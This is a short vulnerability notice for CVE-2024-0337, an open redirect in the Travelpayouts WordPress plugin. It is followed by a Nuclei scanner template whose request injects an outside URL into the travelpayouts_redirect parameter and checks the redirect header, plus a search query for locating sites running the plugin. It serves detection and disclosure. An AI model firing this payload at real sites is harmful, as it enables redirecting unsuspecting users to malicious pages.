The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
PoC代码[已公开]
id: CVE-2024-0337
info:
name: Travelpayouts <= 1.1.16 - Open Redirect
author: s4e-io
severity: medium
description: |
The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
reference:
- https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/
- https://nvd.nist.gov/vuln/detail/CVE-2024-0337
classification:
cve-id: CVE-2024-0337
epss-score: 0.01763
epss-percentile: 0.82111
metadata:
verified: true
max-request: 1
publicwww-query: inurl:"/wp-content/plugins/travelpayouts"
tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?travelpayouts_redirect=https://oast.me"
redirects: true
max-redirects: 2
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 490a00463044022056c1615545411d4e2d3c5fffd8a8a9aadbab4ec5e532ff2453b088bccebc861402205abc04940018053c2a1be7e7b2cde9c98786e516cdf66e6db408407ac5446d55:922c64590222798bb761d5b6d8e72950